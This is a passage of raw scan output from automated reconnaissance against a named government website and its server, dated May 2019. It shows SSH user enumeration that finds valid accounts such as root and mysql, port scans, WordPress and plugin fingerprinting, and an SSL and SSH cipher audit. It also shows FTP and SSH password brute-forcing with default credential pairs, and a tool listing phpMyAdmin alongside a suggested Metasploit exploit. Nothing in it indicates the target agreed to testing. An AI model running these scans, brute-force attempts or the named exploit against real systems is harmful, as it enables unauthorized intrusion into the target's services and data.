1189. [-] 37.58.63.157:22 - SSH - User 'guest' not found
1190. [-] 37.58.63.157:22 - SSH - User 'GUEST' not found
1191. [-] 37.58.63.157:22 - SSH - User 'info' not found
1192. [+] 37.58.63.157:22 - SSH - User 'mail' found
1193. [-] 37.58.63.157:22 - SSH - User 'mailadmin' not found
1194. [-] 37.58.63.157:22 - SSH - User 'msfadmin' not found
1195. [+] 37.58.63.157:22 - SSH - User 'mysql' found
1196. [+] 37.58.63.157:22 - SSH - User 'nobody' found
1197. [-] 37.58.63.157:22 - SSH - User 'oracle' not found
1198. [-] 37.58.63.157:22 - SSH - User 'owaspbwa' not found
1199. [+] 37.58.63.157:22 - SSH - User 'postfix' found
1200. [-] 37.58.63.157:22 - SSH - User 'postgres' not found
1201. [-] 37.58.63.157:22 - SSH - User 'private' not found
1202. [-] 37.58.63.157:22 - SSH - User 'proftpd' not found
1203. [-] 37.58.63.157:22 - SSH - User 'public' not found
1204. [+] 37.58.63.157:22 - SSH - User 'root' found
1205. [-] 37.58.63.157:22 - SSH - User 'superadmin' not found
1206. [-] 37.58.63.157:22 - SSH - User 'support' not found
1207. [-] 37.58.63.157:22 - SSH - User 'sys' not found
1208. [-] 37.58.63.157:22 - SSH - User 'system' not found
1209. [-] 37.58.63.157:22 - SSH - User 'systemadmin' not found
1210. [-] 37.58.63.157:22 - SSH - User 'systemadministrator' not found
1211. [-] 37.58.63.157:22 - SSH - User 'test' not found
1212. [-] 37.58.63.157:22 - SSH - User 'tomcat' not found
1213. [-] 37.58.63.157:22 - SSH - User 'user' not found
1214. [-] 37.58.63.157:22 - SSH - User 'webmaster' not found
1215. [-] 37.58.63.157:22 - SSH - User 'www-data' not found
1216. [-] 37.58.63.157:22 - SSH - User 'Fortimanager_Access' not found
1217. [*] Scanned 1 of 1 hosts (100% complete)
1218. [*] Auxiliary module execution completed
1219. ########################################################################################################################################
1220. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:05 EDT
1221. Nmap scan report for dawa.gov.sd (37.58.63.157)
1222. Host is up (0.11s latency).
1223.  
1224. PORT STATE SERVICE VERSION
1225. 53/tcp open domain (unknown banner: none)
1226. |_dns-fuzz: Server didn't response to our probe, can't fuzz
1227. | dns-nsec-enum:
1228. |_ No NSEC records found
1229. | dns-nsec3-enum:
1230. |_ DNSSEC NSEC3 not supported
1231. | dns-nsid:
1232. |_ bind.version: none
1233. | fingerprint-strings:
1234. | DNSVersionBindReqTCP:
1235. | version
1236. | bind
1237. |_ none
1238. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
1239. SF-Port53-TCP:V=7.70%I=7%D=5/2%Time=5CCACF1E%P=x86_64-pc-linux-gnu%r(DNSVe
1240. SF:rsionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x0
1241. SF:4bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\0
1242. SF:\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
1243. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1244. Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Oracle VM Server 3.4.2 (Linux 4.1) (92%), Linux 3.1 (92%), Linux 3.2 (92%), Linux 3.12 (92%), Linux 3.13 (92%)
1245. No exact OS matches for host (test conditions non-ideal).
1246. Network Distance: 14 hops
1247.  
1248. Host script results:
1249. | dns-brute:
1250. |_ DNS Brute-force hostnames: No results.
1251.  
1252. TRACEROUTE (using port 53/tcp)
1253. HOP RTT ADDRESS
1254. 1 21.52 ms 10.246.200.1
1255. 2 21.91 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
1256. 3 99.40 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
1257. 4 20.55 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
1258. 5 29.14 ms motl-b1-link.telia.net (62.115.162.41)
1259. 6 126.93 ms nyk-bb4-link.telia.net (62.115.134.52)
1260. 7 126.59 ms ldn-bb4-link.telia.net (62.115.112.245)
1261. 8 126.56 ms prs-bb3-link.telia.net (62.115.134.92)
1262. 9 126.59 ms ffm-bb4-link.telia.net (62.115.122.139)
1263. 10 126.31 ms ffm-b10-link.telia.net (62.115.137.211)
1264. 11 120.94 ms leaseweb-ic-146206-ffm-b10.c.telia.net (80.239.132.78)
1265. 12 113.20 ms po-6.ce01.fra-10.de.leaseweb.net (178.162.223.155)
1266. 13 116.76 ms hosted-by.leaseweb.com (46.165.226.255)
1267. 14 113.26 ms 37.58.63.157
1268. #######################################################################################################################################
1269. http://dawa.gov.sd [200 OK] Country[GERMANY][DE], HTML5, IP[37.58.63.157], JQuery[1.12.4], MetaGenerator[Powered by Slider Revolution 5.2.3.5 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface.,Powered by Visual Composer - drag and drop page builder for WordPress.,WordPress 5.0.4], PHP[7.0.33,], Plesk[Lin], PoweredBy[Slider,Visual], Script[text/javascript], UncommonHeaders[x-cache-status], WordPress[5.0.4], WordpressSuperCache, X-Powered-By[PHP/7.0.33, PleskLin]
1270. #######################################################################################################################################
1271.  
1272. wig - WebApp Information Gatherer
1273.  
1274.  
1275. Scanning http://dawa.gov.sd...
1276. _________________________________________ SITE INFO __________________________________________
1277. IP Title
1278. 37.58.63.157
1279.  
1280. __________________________________________ VERSION ___________________________________________
1281. Name Versions Type
1282. WordPress 5.0.4 CMS
1283. Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.4 | 2.4.5 | 2.4.6 | 2.4.7 Platform
1284. 2.4.8 | 2.4.9
1285. PHP 7.0.33 Platform
1286.  
1287. ________________________________________ INTERESTING _________________________________________
1288. URL Note Type
1289. /readme.html Readme file Interesting
1290. /robots.txt robots.txt index Interesting
1291. /login/ Login Page Interesting
1292.  
1293. ___________________________________________ TOOLS ____________________________________________
1294. Name Link Software
1295. wpscan https://github.com/wpscanteam/wpscan WordPress
1296. CMSmap https://github.com/Dionach/CMSmap WordPress
1297.  
1298. ______________________________________________________________________________________________
1299. Time: 265.6 sec Urls: 521 Fingerprints: 40401
1300. #######################################################################################################################################
1301. HTTP/1.1 200 OK
1302. Date: Thu, 02 May 2019 11:12:30 GMT
1303. Content-Type: text/html; charset=UTF-8
1304. X-Powered-By: PHP/7.0.33
1305. Vary: Accept-Encoding,Cookie
1306. Cache-Control: max-age=3, must-revalidate
1307. X-Cache-Status: STALE
1308. X-Powered-By: PleskLin
1309. Connection: keep-alive
1310.  
1311. HTTP/1.1 200 OK
1312. Date: Thu, 02 May 2019 11:12:31 GMT
1313. Content-Type: text/html; charset=UTF-8
1314. X-Powered-By: PHP/7.0.33
1315. Vary: Accept-Encoding,Cookie
1316. Cache-Control: max-age=3, must-revalidate
1317. X-Cache-Status: UPDATING
1318. X-Powered-By: PleskLin
1319. Connection: keep-alive
1320. #######################################################################################################################################
1321. OWL Carousel
1322. jQuery Migrate
1323. PHP 7.0.33
1324. WordPress Super Cache
1325. Revslider
1326. jQuery 1.12.4
1327. Underscore.js 1.8.3
1328. WordPress
1329. X-Cache-Status: HIT
1330. #######################################################################################################################################
1331. https://dawa.gov.sd [200 OK] Country[GERMANY][DE], HTML5, HTTPServer[nginx], IP[37.58.63.157], JQuery[1.12.4], MetaGenerator[Powered by Slider Revolution 5.2.3.5 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface.,Powered by Visual Composer - drag and drop page builder for WordPress.,WordPress 5.0.4], PHP[7.0.33,], Plesk[Lin], PoweredBy[Slider,Visual], Script[text/javascript], UncommonHeaders[link,x-cache-status], WordPress[5.0.4], WordpressSuperCache, X-Powered-By[PHP/7.0.33, PleskLin], nginx
1332. #######################################################################################################################################
1333. OWL Carousel
1334. jQuery Migrate
1335. PHP 7.0.33
1336. WordPress Super Cache
1337. Revslider
1338. jQuery 1.12.4
1339. Underscore.js 1.8.3
1340. WordPress
1341. X-Cache-Status: MISS
1342. #######################################################################################################################################
1343. Version: 1.11.13-static
1344. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1345.  
1346. Connected to 37.58.63.157
1347.  
1348. Testing SSL server dawa.gov.sd on port 443 using SNI name dawa.gov.sd
1349.  
1350. TLS Fallback SCSV:
1351. Server supports TLS Fallback SCSV
1352.  
1353. TLS renegotiation:
1354. Secure session renegotiation supported
1355.  
1356. TLS Compression:
1357. Compression disabled
1358.  
1359. Heartbleed:
1360. TLS 1.2 not vulnerable to heartbleed
1361. TLS 1.1 not vulnerable to heartbleed
1362. TLS 1.0 not vulnerable to heartbleed
1363.  
1364. Supported Server Cipher(s):
1365. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
1366. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
1367. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
1368. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
1369. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1370. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1371. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
1372. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
1373. Accepted TLSv1.2 128 bits AES128-SHA256
1374. Accepted TLSv1.2 256 bits AES256-SHA256
1375. Accepted TLSv1.2 128 bits AES128-SHA
1376. Accepted TLSv1.2 256 bits AES256-SHA
1377. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
1378. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
1379. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1380. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1381. Accepted TLSv1.1 128 bits AES128-SHA
1382. Accepted TLSv1.1 256 bits AES256-SHA
1383. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
1384. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
1385. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1386. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1387. Accepted TLSv1.0 128 bits AES128-SHA
1388. Accepted TLSv1.0 256 bits AES256-SHA
1389. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
1390. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
1391.  
1392. SSL Certificate:
1393. Signature Algorithm: sha256WithRSAEncryption
1394. RSA Key Strength: 2048
1395.  
1396. Subject: Plesk
1397. Issuer: Plesk
1398.  
1399. Not valid before: Jan 25 15:00:17 2017 GMT
1400. Not valid after: Jan 25 15:00:17 2018 GMT
1401. #######################################################################################################################################
1402. --------------------------------------------------------
1403. <<<Yasuo discovered following vulnerable applications>>>
1404. --------------------------------------------------------
1405. +------------+---------------------------------------+--------------------------------------------------+----------+----------+
1406. | App Name | URL to Application | Potential Exploit | Username | Password |
1407. +------------+---------------------------------------+--------------------------------------------------+----------+----------+
1408. | phpMyAdmin | https://37.58.63.157:8443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | None | None |
1409. +------------+---------------------------------------+--------------------------------------------------+----------+---------
1410. #######################################################################################################################################
1411. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:21 EDT
1412. Nmap scan report for 37.58.63.157
1413. Host is up (0.13s latency).
1414. Not shown: 459 closed ports, 3 filtered ports
1415. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1416. PORT STATE SERVICE
1417. 21/tcp open ftp
1418. 22/tcp open ssh
1419. 53/tcp open domain
1420. 80/tcp open http
1421. 110/tcp open pop3
1422. 143/tcp open imap
1423. 443/tcp open https
1424. 465/tcp open smtps
1425. 993/tcp open imaps
1426. 995/tcp open pop3s
1427. 3306/tcp open mysql
1428. 7080/tcp open empowerid
1429. 8443/tcp open https-alt
1430. 8880/tcp open cddbp-alt
1431. #######################################################################################################################################
1432. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:21 EDT
1433. Nmap scan report for 37.58.63.157
1434. Host is up (0.14s latency).
1435. Not shown: 9 closed ports, 2 filtered ports
1436. PORT STATE SERVICE
1437. 53/udp open domain
1438. 68/udp open|filtered dhcpc
1439. 139/udp open|filtered netbios-ssn
1440. #######################################################################################################################################
1441. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:21 EDT
1442. Nmap scan report for 37.58.63.157
1443. Host is up (0.11s latency).
1444.  
1445. PORT STATE SERVICE VERSION
1446. 21/tcp open ftp
1447. | fingerprint-strings:
1448. | GenericLines:
1449. | 220 ProFTPD Server (ProFTPD) [37.58.63.157]
1450. | Invalid command: try being more creative
1451. | Invalid command: try being more creative
1452. | NULL, SMBProgNeg:
1453. |_ 220 ProFTPD Server (ProFTPD) [37.58.63.157]
1454. | ftp-brute:
1455. | Accounts: No valid accounts found
1456. |_ Statistics: Performed 7201 guesses in 180 seconds, average tps: 36.3
1457. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
1458. SF-Port21-TCP:V=7.70%I=7%D=5/2%Time=5CCAD2C4%P=x86_64-pc-linux-gnu%r(NULL,
1459. SF:2D,"220\x20ProFTPD\x20Server\x20\(ProFTPD\)\x20\[37\.58\.63\.157\]\r\n"
1460. SF:)%r(GenericLines,89,"220\x20ProFTPD\x20Server\x20\(ProFTPD\)\x20\[37\.5
1461. SF:8\.63\.157\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20c
1462. SF:reative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creati
1463. SF:ve\r\n")%r(SMBProgNeg,2D,"220\x20ProFTPD\x20Server\x20\(ProFTPD\)\x20\[
1464. SF:37\.58\.63\.157\]\r\n");
1465. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1466. Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.18 (94%), Oracle VM Server 3.4.2 (Linux 4.1) (92%), Linux 3.1 (92%), Linux 3.2 (92%), Linux 3.12 (92%), Linux 3.13 (92%)
1467. No exact OS matches for host (test conditions non-ideal).
1468. Network Distance: 14 hops
1469.  
1470. TRACEROUTE (using port 21/tcp)
1471. HOP RTT ADDRESS
1472. 1 22.03 ms 10.246.200.1
1473. 2 27.03 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
1474. 3 21.30 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
1475. 4 20.67 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
1476. 5 27.05 ms motl-b1-link.telia.net (62.115.162.41)
1477. 6 124.51 ms nyk-bb4-link.telia.net (62.115.134.52)
1478. 7 119.30 ms ldn-bb3-link.telia.net (62.115.113.21)
1479. 8 119.30 ms prs-bb4-link.telia.net (62.115.114.229)
1480. 9 118.90 ms ffm-bb4-link.telia.net (62.115.114.99)
1481. 10 118.89 ms ffm-b10-link.telia.net (62.115.137.211)
1482. 11 113.15 ms leaseweb-ic-146206-ffm-b10.c.telia.net (80.239.132.78)
1483. 12 112.93 ms po-8.ce01.fra-10.de.leaseweb.net (178.162.223.165)
1484. 13 115.88 ms hosted-by.leaseweb.com (46.165.226.253)
1485. 14 113.19 ms 37.58.63.157
1486. #######################################################################################################################################
1487. # general
1488. (gen) banner: SSH-2.0-OpenSSH_7.4
1489. (gen) software: OpenSSH 7.4
1490. (gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
1491. (gen) compression: enabled (zlib@openssh.com)
1492.  
1493. # key exchange algorithms
1494. (kex) curve25519-sha256 -- [warn] unknown algorithm
1495. (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
1496. (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
1497. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1498. (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
1499. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1500. (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
1501. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1502. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
1503. `- [info] available since OpenSSH 4.4
1504. (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
1505. (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
1506. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1507. `- [warn] using weak hashing algorithm
1508. `- [info] available since OpenSSH 2.3.0
1509. (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
1510. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
1511. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
1512. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1513. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
1514. `- [warn] using small 1024-bit modulus
1515. `- [warn] using weak hashing algorithm
1516. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
1517.  
1518. # host-key algorithms
1519. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
1520. (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
1521. (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
1522. (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
1523. `- [warn] using weak random number generator could reveal the key
1524. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1525. (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
1526.  
1527. # encryption algorithms (ciphers)
1528. (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
1529. `- [info] default cipher since OpenSSH 6.9.
1530. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1531. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
1532. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1533. (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
1534. (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
1535. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1536. `- [warn] using weak cipher mode
1537. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
1538. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1539. `- [warn] using weak cipher mode
1540. `- [info] available since OpenSSH 2.3.0
1541. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1542. `- [warn] using weak cipher mode
1543. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
1544. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1545. `- [fail] disabled since Dropbear SSH 0.53
1546. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1547. `- [warn] using weak cipher mode
1548. `- [warn] using small 64-bit block size
1549. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
1550. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1551. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1552. `- [warn] using weak cipher mode
1553. `- [warn] using small 64-bit block size
1554. `- [info] available since OpenSSH 2.1.0
1555. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1556. `- [warn] using weak cipher
1557. `- [warn] using weak cipher mode
1558. `- [warn] using small 64-bit block size
1559. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
1560.  
1561. # message authentication code algorithms
1562. (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
1563. `- [info] available since OpenSSH 6.2
1564. (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
1565. (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
1566. (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
1567. (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
1568. `- [info] available since OpenSSH 6.2
1569. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
1570. `- [warn] using small 64-bit tag size
1571. `- [info] available since OpenSSH 4.7
1572. (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
1573. `- [info] available since OpenSSH 6.2
1574. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
1575. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1576. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
1577. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1578. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
1579. `- [warn] using weak hashing algorithm
1580. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1581.  
1582. # algorithm recommendations (for OpenSSH 7.4)
1583. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
1584. (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
1585. (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
1586. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
1587. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
1588. (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
1589. (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
1590. (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
1591. (rec) -blowfish-cbc -- enc algorithm to remove
1592. (rec) -3des-cbc -- enc algorithm to remove
1593. (rec) -aes256-cbc -- enc algorithm to remove
1594. (rec) -cast128-cbc -- enc algorithm to remove
1595. (rec) -aes192-cbc -- enc algorithm to remove
1596. (rec) -aes128-cbc -- enc algorithm to remove
1597. (rec) -hmac-sha2-512 -- mac algorithm to remove
1598. (rec) -umac-128@openssh.com -- mac algorithm to remove
1599. (rec) -hmac-sha2-256 -- mac algorithm to remove
1600. (rec) -umac-64@openssh.com -- mac algorithm to remove
1601. (rec) -hmac-sha1 -- mac algorithm to remove
1602. (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
1603. (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
1604. #######################################################################################################################################
1605. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:25 EDT
1606. NSE: [ssh-run] Failed to specify credentials and command to run.
1607. NSE: [ssh-brute] Trying username/password pair: root:root
1608. NSE: [ssh-brute] Trying username/password pair: admin:admin
1609. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
1610. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
1611. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
1612. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
1613. NSE: [ssh-brute] Trying username/password pair: guest:guest
1614. NSE: [ssh-brute] Trying username/password pair: user:user
1615. NSE: [ssh-brute] Trying username/password pair: web:web
1616. NSE: [ssh-brute] Trying username/password pair: test:test
1617. NSE: [ssh-brute] Trying username/password pair: root:
1618. NSE: [ssh-brute] Trying username/password pair: admin:
1619. NSE: [ssh-brute] Trying username/password pair: administrator:
1620. NSE: [ssh-brute] Trying username/password pair: webadmin:
1621. NSE: [ssh-brute] Trying username/password pair: sysadmin:
1622. NSE: [ssh-brute] Trying username/password pair: netadmin:
1623. NSE: [ssh-brute] Trying username/password pair: guest:
1624. NSE: [ssh-brute] Trying username/password pair: user:
1625. NSE: [ssh-brute] Trying username/password pair: web:
1626. NSE: [ssh-brute] Trying username/password pair: test:
1627. NSE: [ssh-brute] Trying username/password pair: root:123456
1628. NSE: [ssh-brute] Trying username/password pair: admin:123456
1629. NSE: [ssh-brute] Trying username/password pair: administrator:123456
1630. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
1631. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
1632. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
1633. NSE: [ssh-brute] Trying username/password pair: guest:123456
1634. NSE: [ssh-brute] Trying username/password pair: user:123456
1635. NSE: [ssh-brute] Trying username/password pair: web:123456
1636. NSE: [ssh-brute] Trying username/password pair: test:123456
1637. NSE: [ssh-brute] Trying username/password pair: root:12345
1638. NSE: [ssh-brute] Trying username/password pair: admin:12345
1639. NSE: [ssh-brute] Trying username/password pair: administrator:12345
1640. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
1641. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
1642. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
1643. NSE: [ssh-brute] Trying username/password pair: guest:12345
1644. NSE: [ssh-brute] Trying username/password pair: user:12345
1645. NSE: [ssh-brute] Trying username/password pair: web:12345
1646. NSE: [ssh-brute] Trying username/password pair: test:12345
1647. NSE: [ssh-brute] Trying username/password pair: root:123456789
1648. NSE: [ssh-brute] Trying username/password pair: admin:123456789
1649. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
1650. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
1651. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
1652. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
1653. NSE: [ssh-brute] Trying username/password pair: guest:123456789
1654. NSE: [ssh-brute] Trying username/password pair: user:123456789
1655. NSE: [ssh-brute] Trying username/password pair: web:123456789
1656. NSE: [ssh-brute] Trying username/password pair: test:123456789
1657. NSE: [ssh-brute] Trying username/password pair: root:password
1658. NSE: [ssh-brute] Trying username/password pair: admin:password
1659. NSE: [ssh-brute] Trying username/password pair: administrator:password
1660. NSE: [ssh-brute] Trying username/password pair: webadmin:password
1661. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
1662. NSE: [ssh-brute] Trying username/password pair: netadmin:password
1663. NSE: [ssh-brute] Trying username/password pair: guest:password
1664. NSE: [ssh-brute] Trying username/password pair: user:password
1665. NSE: [ssh-brute] Trying username/password pair: web:password
1666. NSE: [ssh-brute] Trying username/password pair: test:password
1667. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
1668. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
1669. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
1670. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
1671. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
1672. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
1673. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
1674. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
1675. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
1676. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
1677. NSE: [ssh-brute] Trying username/password pair: root:princess
1678. NSE: [ssh-brute] Trying username/password pair: admin:princess
1679. NSE: [ssh-brute] Trying username/password pair: administrator:princess
1680. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
1681. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
1682. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
1683. NSE: [ssh-brute] Trying username/password pair: guest:princess
1684. NSE: [ssh-brute] Trying username/password pair: user:princess
1685. NSE: [ssh-brute] Trying username/password pair: web:princess
1686. NSE: [ssh-brute] Trying username/password pair: test:princess
1687. NSE: [ssh-brute] Trying username/password pair: root:12345678
1688. NSE: [ssh-brute] Trying username/password pair: admin:12345678
1689. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
1690. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
1691. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
1692. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
1693. NSE: [ssh-brute] Trying username/password pair: guest:12345678
1694. NSE: [ssh-brute] Trying username/password pair: user:12345678
1695. NSE: [ssh-brute] Trying username/password pair: web:12345678
1696. NSE: [ssh-brute] Trying username/password pair: test:12345678
1697. NSE: [ssh-brute] Trying username/password pair: root:1234567
1698. NSE: [ssh-brute] Trying username/password pair: admin:1234567
1699. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
1700. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
1701. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
1702. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
1703. NSE: [ssh-brute] Trying username/password pair: guest:1234567
1704. NSE: [ssh-brute] Trying username/password pair: user:1234567
1705. NSE: [ssh-brute] Trying username/password pair: web:1234567
1706. NSE: [ssh-brute] Trying username/password pair: test:1234567
1707. NSE: [ssh-brute] Trying username/password pair: root:abc123
1708. NSE: [ssh-brute] Trying username/password pair: admin:abc123
1709. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
1710. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
1711. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
1712. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
